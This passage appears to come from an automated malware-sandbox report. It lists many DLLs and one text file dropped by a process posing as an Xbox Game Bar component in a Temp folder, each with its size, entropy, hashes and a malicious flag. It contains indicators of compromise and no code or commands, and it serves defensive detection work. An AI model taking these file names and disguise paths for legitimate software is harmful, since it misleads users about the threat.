                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):84760
                                                                                                                                                                                                                                        Entropy (8bit):6.570831353064175
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:PdQz7pZ3catNZTRGE51LOBK5bib8tsfYqpIPCV17SyQPx:VQz9Z5VOwiItsAqpIPCV1Gx
                                                                                                                                                                                                                                        MD5:3859239CED9A45399B967EBCE5A6BA23
                                                                                                                                                                                                                                        SHA1:6F8FF3DF90AC833C1EB69208DB462CDA8CA3F8D6
                                                                                                                                                                                                                                        SHA-256:A4DD883257A7ACE84F96BCC6CD59E22D843D0DB080606DEFAE32923FC712C75A
                                                                                                                                                                                                                                        SHA-512:030E5CE81E36BD55F69D55CBB8385820EB7C1F95342C1A32058F49ABEABB485B1C4A30877C07A56C9D909228E45A4196872E14DED4F87ADAA8B6AD97463E5C69
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):181760
                                                                                                                                                                                                                                        Entropy (8bit):6.176962076839488
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:jm3K87nKna75PQrBjfFKYG50nzkL+CrXfU+PS7KiSTLkKKYYg4UO:jmb7Ma7KdFKEnOrXf7biSTLLIXUO
                                                                                                                                                                                                                                        MD5:FDE9A1D6590026A13E81712CD2F23522
                                                                                                                                                                                                                                        SHA1:CA99A48CAEA0DBACCF4485AFD959581F014277ED
                                                                                                                                                                                                                                        SHA-256:16ECCC4BAF6CF4AB72ACD53C72A1F2B04D952E07E385E9050A933E78074A7D5B
                                                                                                                                                                                                                                        SHA-512:A522661F5C3EEEA89A39DF8BBB4D23E6428C337AAC1D231D32B39005EA8810FCE26AF18454586E0E94E51EA4AC0E034C88652C1C09B1ED588AEAC461766981F4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):123664
                                                                                                                                                                                                                                        Entropy (8bit):6.058417150946148
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:c7u5LnIx1If3yJdqfLI2AYX5BO89IPLPPUxdF:cwxfijqfLI29BO8VF
                                                                                                                                                                                                                                        MD5:BD36F7D64660D120C6FB98C8F536D369
                                                                                                                                                                                                                                        SHA1:6829C9CE6091CB2B085EB3D5469337AC4782F927
                                                                                                                                                                                                                                        SHA-256:EE543453AC1A2B9B52E80DC66207D3767012CA24CE2B44206804767F37443902
                                                                                                                                                                                                                                        SHA-512:BD15F6D4492DDBC89FCBADBA07FC10AA6698B13030DD301340B5F1B02B74191FAF9B3DCF66B72ECF96084656084B531034EA5CADC1DD333EF64AFB69A1D1FD56
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):253200
                                                                                                                                                                                                                                        Entropy (8bit):6.559097478184273
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:7t9gXW32tb0yf6CgLp+E4YECs5wxvj9qWM53pLW1Apw9tBg2YAp:7ngXW3wgyCiE4texvGI4Ap
                                                                                                                                                                                                                                        MD5:65B4AB77D6C6231C145D3E20E7073F51
                                                                                                                                                                                                                                        SHA1:23D5CE68ED6AA8EAABE3366D2DD04E89D248328E
                                                                                                                                                                                                                                        SHA-256:93EB9D1859EDCA1C29594491863BF3D72AF70B9A4240E0D9DD171F668F4F8614
                                                                                                                                                                                                                                        SHA-512:28023446E5AC90E9E618673C879CA46F598A62FBB9E69EF925DB334AD9CB1544916CAF81E2ECDC26B75964DCEDBA4AD4DE1BA2C42FB838D0DF504D963FCF17EE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65304
                                                                                                                                                                                                                                        Entropy (8bit):6.222786912280051
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6TO+CPN/pV8ETeERZX/fchw/IpBIPOIVQ7SygPx:mClZZow/IpBIPOIVQyx
                                                                                                                                                                                                                                        MD5:4255C44DC64F11F32C961BF275AAB3A2
                                                                                                                                                                                                                                        SHA1:C1631B2821A7E8A1783ECFE9A14DB453BE54C30A
                                                                                                                                                                                                                                        SHA-256:E557873D5AD59FD6BD29D0F801AD0651DBB8D9AC21545DEFE508089E92A15E29
                                                                                                                                                                                                                                        SHA-512:7D3A306755A123B246F31994CD812E7922943CDBBC9DB5A6E4D3372EA434A635FFD3945B5D2046DE669E7983EF2845BD007A441D09CFE05CF346523C12BDAD52
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):158992
                                                                                                                                                                                                                                        Entropy (8bit):6.8491146526380025
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:A4lirS97HrdVmEkGCm5hAznf49mNo2NOvJ02pIPZ1wBExN:VlirG0EkTVAYO2NQ3w
                                                                                                                                                                                                                                        MD5:E5ABC3A72996F8FDE0BCF709E6577D9D
                                                                                                                                                                                                                                        SHA1:15770BDCD06E171F0B868C803B8CF33A8581EDD3
                                                                                                                                                                                                                                        SHA-256:1796038480754A680F33A4E37C8B5673CC86C49281A287DC0C5CAE984D0CB4BB
                                                                                                                                                                                                                                        SHA-512:B347474DC071F2857E1E16965B43DB6518E35915B8168BDEFF1EAD4DFF710A1CC9F04CA0CED23A6DE40D717EEA375EEDB0BF3714DAF35DE6A77F071DB33DFAE6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):34584
                                                                                                                                                                                                                                        Entropy (8bit):6.4080285175428715
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:aHI6RwgJ5xe3Sc88GnJ8xIPWtpu5YiSyvDIqPxWEu:CIoJ5U3Sc88GJ8xIPWtpE7SyMqPx
                                                                                                                                                                                                                                        MD5:827439C35A0CEE0DE6421AF039CA7FF9
                                                                                                                                                                                                                                        SHA1:E7FDC4624C3D4380E527EE6997D4EBDEEC353EEA
                                                                                                                                                                                                                                        SHA-256:B86E19E57A415AE9D65D4C0A86658DE2D2AD6A97617CB514A105449C9B679D89
                                                                                                                                                                                                                                        SHA-512:92F2344253ECCF24CAFDA8F5559E2FA4C21D5B0889540139278032491596EC0AC743B18D4074AE12CB15060EDFED14B243A37B23434E7B2F15998FADDA3D15F3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):50968
                                                                                                                                                                                                                                        Entropy (8bit):6.432736275046285
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:gwFMCcP4W1vqJiR5RMWlpX4Ju6r2VIPXtz5YiSyvbPxWEuw:ZFMiJifKJulVIPXt97SyjPx9
                                                                                                                                                                                                                                        MD5:E5ACEAF21E82253E300C0B78793887A8
                                                                                                                                                                                                                                        SHA1:C58F78FBBE8713CB00CCDFEB1D8D7359F58EBFDE
                                                                                                                                                                                                                                        SHA-256:D950342686C959056FF43C9E5127554760FA20669D97166927DD6AAE5494E02A
                                                                                                                                                                                                                                        SHA-512:517C29928D6623CF3B2BCDCD68551070D2894874893C0D115A0172D749B6FE102AF6261C0FD1B65664F742FA96ABBCE2F8111A72E1A3C2F574B58B909205937F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32528
                                                                                                                                                                                                                                        Entropy (8bit):6.448063770045404
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:AuCvO+MZFryl9SDCP6rXv+mkWsniRq9IPQUkHQIYiSy1pCQqIPxh8E9VF0NykOBw:1+yF+6rX2mk599IPQUO5YiSyv3PxWEun
                                                                                                                                                                                                                                        MD5:F00133F7758627A15F2D98C034CF1657
                                                                                                                                                                                                                                        SHA1:2F5F54EDA4634052F5BE24C560154AF6647EEE05
                                                                                                                                                                                                                                        SHA-256:35609869EDC57D806925EC52CCA9BC5A035E30D5F40549647D4DA6D7983F8659
                                                                                                                                                                                                                                        SHA-512:1C77DD811D2184BEEDF3C553C3F4DA2144B75C6518543F98C630C59CD597FCBF6FD22CFBB0A7B9EA2FDB7983FF69D0D99E8201F4E84A0629BC5733AA09FFC201
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):79640
                                                                                                                                                                                                                                        Entropy (8bit):6.290841920161528
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:0JltpedXL+3ujz9/s+S+pzpMoiyivViaE9IPLwj7SyZPx:07tp4i3ujz9/sT+pzqoavVpE9IPLwjHx
                                                                                                                                                                                                                                        MD5:1EEA9568D6FDEF29B9963783827F5867
                                                                                                                                                                                                                                        SHA1:A17760365094966220661AD87E57EFE09CD85B84
                                                                                                                                                                                                                                        SHA-256:74181072392A3727049EA3681FE9E59516373809CED53E08F6DA7C496B76E117
                                                                                                                                                                                                                                        SHA-512:D9443B70FCDC4D0EA1CB93A88325012D3F99DB88C36393A7DED6D04F590E582F7F1640D8B153FE3C5342FA93802A8374F03F6CD37DD40CDBB5ADE2E07FAD1E09
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):120080
                                                                                                                                                                                                                                        Entropy (8bit):6.255942152365855
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:eZ1UnKJVckfKr0in6CL1F4TSlNdtAhfw5ymJSoEQ6MV4KUq8BIPOQXxxp:ecnoVckfjab5kQ6FPC
                                                                                                                                                                                                                                        MD5:D7B9ED5F37519B68750ECB5DEFB8E957
                                                                                                                                                                                                                                        SHA1:661CF73707E02D2837F914ADC149B61A120DDA7D
                                                                                                                                                                                                                                        SHA-256:2CE63E16DF518AE178DE0940505FF1B11DA97A5B175FE2A0D355B2EE351C55FD
                                                                                                                                                                                                                                        SHA-512:F04708C28FEB54F355D977E462245B183A0B50F4DB6926C767E8F1499E83E910B05A3023B84D398FB5DD87743FE6146DBBC3E1CAAED5351C27396F16746C6D6B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):161040
                                                                                                                                                                                                                                        Entropy (8bit):6.029728458381984
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:LMaGbIQQbN9W3PiNGeA66l8rBk3xA87xfCA+nbUtFMsVjTNbEzc+pIPC7ODxd:LMaG0bN96oG1l8YA8ZMSR+E
                                                                                                                                                                                                                                        MD5:208B0108172E59542260934A2E7CFA85
                                                                                                                                                                                                                                        SHA1:1D7FFB1B1754B97448EB41E686C0C79194D2AB3A
                                                                                                                                                                                                                                        SHA-256:5160500474EC95D4F3AF7E467CC70CB37BEC1D12545F0299AAB6D69CEA106C69
                                                                                                                                                                                                                                        SHA-512:41ABF6DEAB0F6C048967CA6060C337067F9F8125529925971BE86681EC0D3592C72B9CC85DD8BDEE5DD3E4E69E3BB629710D2D641078D5618B4F55B8A60CC69D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25360
                                                                                                                                                                                                                                        Entropy (8bit):6.6307231018245325
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:SR9ZfwFpEWE6ivQpIPZwGjHQIYiSy1pCQKzmPxh8E9VF0NyptVQcM:SRvqpEM4QpIPZw65YiSyvamPxWE3PS
                                                                                                                                                                                                                                        MD5:46E9D7B5D9668C9DB5CAA48782CA71BA
                                                                                                                                                                                                                                        SHA1:6BBC83A542053991B57F431DD377940418848131
                                                                                                                                                                                                                                        SHA-256:F6063622C0A0A34468679413D1B18D1F3BE67E747696AB972361FAED4B8D6735
                                                                                                                                                                                                                                        SHA-512:C5B171EBDB51B1755281C3180B30E88796DB8AA96073489613DAB96B6959A205846711187266A0BA30782102CE14FBFA4D9F413A2C018494597600482329EBF7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):37888
                                                                                                                                                                                                                                        Entropy (8bit):5.536883608844324
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:wQm5druFG/nDOnnvM7+gu305jTbEsU4qtp3/G0mTtAeSUhCE3umLUn0qQlwwHQoY:W58OSE7Gs+D/xmTllQFqLgM6/0
                                                                                                                                                                                                                                        MD5:4B5DCC46170E4AC810A59CA5B7533462
                                                                                                                                                                                                                                        SHA1:1EACF60FDFD427909B54F83518612A4638930225
                                                                                                                                                                                                                                        SHA-256:704CDCFCA773AC658B8F84335F29630707C216F739F7FA5970B1BE57F13A5B82
                                                                                                                                                                                                                                        SHA-512:C2E5B9B40F267F375234BE9A562882FAA1A0E82F32A951233464D27879D0B1620099BB800DE3E96BE277BB3BB44FF421A98A2F0C125F28652C2B6415D0FB4DEA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):207872
                                                                                                                                                                                                                                        Entropy (8bit):6.104353771977755
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:Q1Krrzce1C8X3N/2AZXIQ+FvcSpOXelJfNgDdZgFqrrP:nrzxjXRhAQehgDdiFGr
                                                                                                                                                                                                                                        MD5:A7B4711C5BA1866745485ABE14101AC7
                                                                                                                                                                                                                                        SHA1:C37158CBD0FE67F8ACD61596F63CF62BD2985431
                                                                                                                                                                                                                                        SHA-256:6688F3DD5B7EFA8008C5BA776F32CECF5B42887B1B9EE21555AE3E0D4F13D2E0
                                                                                                                                                                                                                                        SHA-512:F952AD3C21B649E13E64540713A61DB6D49B394CA5D62ADD7A5FEC2186A8D27131BA038D449561B77670D3DEB2358A8254E4E205EF20228E27B1EB8234D0E843
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):34816
                                                                                                                                                                                                                                        Entropy (8bit):5.620393374613542
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:zVFT6fGGeAoBw4L0Slb3KFHzZgnq/A5MnOty9+AetDHVsSWBDPMEYcAe9hNugNYU:zTG3hzuot+AAaLIEYclH+uLB3
                                                                                                                                                                                                                                        MD5:2F2A2B2343549E990419DF0977E3FAC9
                                                                                                                                                                                                                                        SHA1:5724B63E32BDA7D36285F79DC9AD57FC97BA5415
                                                                                                                                                                                                                                        SHA-256:9569B0B501A0235388D075BAA4C84E5D571169AC6CE3AE9220CDE31A5F208B94
                                                                                                                                                                                                                                        SHA-512:A1B99DCAF01666C3AB9755D55001F3A18344CD70C386CE1B2233B5C6B8248B59D95804B450F9EE9C2F51D6293C4E748B9347540AE3F247418A1673BBD6EF466A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):24064
                                                                                                                                                                                                                                        Entropy (8bit):5.3682936455537416
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:/NyocbRskh0rtT4vl8823C0/FCvNeu71vWRt7ARlgTeVycRguvNOM7:4ocd5hpdWCc3YoIIM7
                                                                                                                                                                                                                                        MD5:AA40AC7A7D1D9A10DA426701EA49508D
                                                                                                                                                                                                                                        SHA1:BBD083535E20EA00BCC40DE7B9E625FF5C74851E
                                                                                                                                                                                                                                        SHA-256:B892CBAF1A5B363FB66768194CD4D466916E81981BCB63C2989277114A4B0C10
                                                                                                                                                                                                                                        SHA-512:EAF14159F5F1B70DCB5E6416804F306EC5F4C235ABF431A27BC421861117BE8C6EC5326C8C703C4C3764B771E5DBAC37E6B93AC05F9A632BC83788C476EED8E2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):301568
                                                                                                                                                                                                                                        Entropy (8bit):6.375720417060108
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:GSL1oP995ooVABNirLq0l/IzkQ37P6BdeAb6:Gh19NO7irLq0l/IzB37Pe6
                                                                                                                                                                                                                                        MD5:03EF5E8DA65667751E1FD3FA0C182D3E
                                                                                                                                                                                                                                        SHA1:4608D1EFCA23143006C1338DEDA144A2F3BB8A16
                                                                                                                                                                                                                                        SHA-256:3D1C66BDCB4FA0B8E917895E1B4D62EE14260EAA1BD6FE908877C47585EC6127
                                                                                                                                                                                                                                        SHA-512:C094A3DFBD863726524C56DAB2592B3513A3A8C445BCAAC6CFB41A5DDEC3079D9B1F849C6826C1CC4241CA8B0AA44E33D2502BB20856313966AF31F480BA8811
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):278952
                                                                                                                                                                                                                                        Entropy (8bit):6.049041164740881
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:QW1H/M8fRR0mNplkXCRrVADwYCuCigT/Q5MSRqNb7d86:QWN/TRLNLWCRrI55MWavdJ
                                                                                                                                                                                                                                        MD5:8D0619BFE30DEADF6F21196F0F8D53D3
                                                                                                                                                                                                                                        SHA1:E7ABD65A8CCAFEFF6CAF6A2FF98D27D24D87C9AD
                                                                                                                                                                                                                                        SHA-256:B301535DCA491D9814EA28FAA320AC7A19D0F5D94237996FA0A3B5A936432514
                                                                                                                                                                                                                                        SHA-512:5A88E4A06B98832AAA9BBB89E382F6C7E9B65C5ECBA48DE8F4FF1FA58BB06A74B9C2F6B2EC185C2A306CB0B5D68D0B28D74B323432A0B2953D8DFC29FED920D7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10752
                                                                                                                                                                                                                                        Entropy (8bit):4.663205590455457
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:qlTp72HzA5iJewkY0hQMsQJCUCLsZEA4elh3XQMtCFNGioUjQcX6g8cim1qeSju1:ql12HzzjBbRYoesfoRcqgvimoe
                                                                                                                                                                                                                                        MD5:FA50D9F8BCE6BD13652F5090E7B82C4D
                                                                                                                                                                                                                                        SHA1:EE137DA302A43C2F46D4323E98FFD46D92CF4BEF
                                                                                                                                                                                                                                        SHA-256:FFF69928DEA1432E0C7CB1225AB96F94FD38D5D852DE9A6BB8BF30B7D2BEDCEB
                                                                                                                                                                                                                                        SHA-512:341CEC015E74348EAB30D86EBB35C028519703006814A2ECD19B9FE5E6FCB05EDA6DDE0AAF4FE624D254B0D0180EC32ADF3B93EE96295F8F0F4C9D4ED27A7C0C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):115712
                                                                                                                                                                                                                                        Entropy (8bit):5.890497931382238
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:rKLwVA2epJbdfD3NTSGkzsvDNIWN4ZgibPq0kgIWgymA5TGK2MLVur:rKL/dhTMzsbNd9ibPavPA5TGK7Qr
                                                                                                                                                                                                                                        MD5:2D1F2FFD0FECF96A053043DAAD99A5DF
                                                                                                                                                                                                                                        SHA1:B03D5F889E55E802D3802D0F0CAA4D29C538406B
                                                                                                                                                                                                                                        SHA-256:207BBAE9DDF8BDD64E65A8D600FE1DD0465F2AFCD6DC6E28D4D55887CD6CBD13
                                                                                                                                                                                                                                        SHA-512:4F7D68F241A7F581E143A010C78113154072C63ADFF5F200EF67EB34D766D14CE872D53183EB2B96B1895AA9C8D4CA82EE5E61E1C5E655FF5BE56970BE9EBE3E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6673920
                                                                                                                                                                                                                                        Entropy (8bit):6.582002531606852
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:EzN+T+xtLlk0PPMAiGoTzeDy3x8lGBlWi9Nk:E5Y6Jk0PPMtfTzp3x8c
                                                                                                                                                                                                                                        MD5:486085AAC7BB246A173CEEA0879230AF
                                                                                                                                                                                                                                        SHA1:EF1095843B2A9C6D8285C7D9E8E334A9CE812FAE
                                                                                                                                                                                                                                        SHA-256:C3964FC08E4CA8BC193F131DEF6CC4B4724B18073AA0E12FED8B87C2E627DC83
                                                                                                                                                                                                                                        SHA-512:8A56774A08DA0AB9DD561D21FEBEEBC23A5DEA6F63D5638EA1B608CD923B857DF1F096262865E6EBD56B13EFD3BBA8D714FFDCE8316293229974532C49136460
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51712
                                                                                                                                                                                                                                        Entropy (8bit):5.664902275560485
                                                                                                                                                                                                                                        Encrypted:false
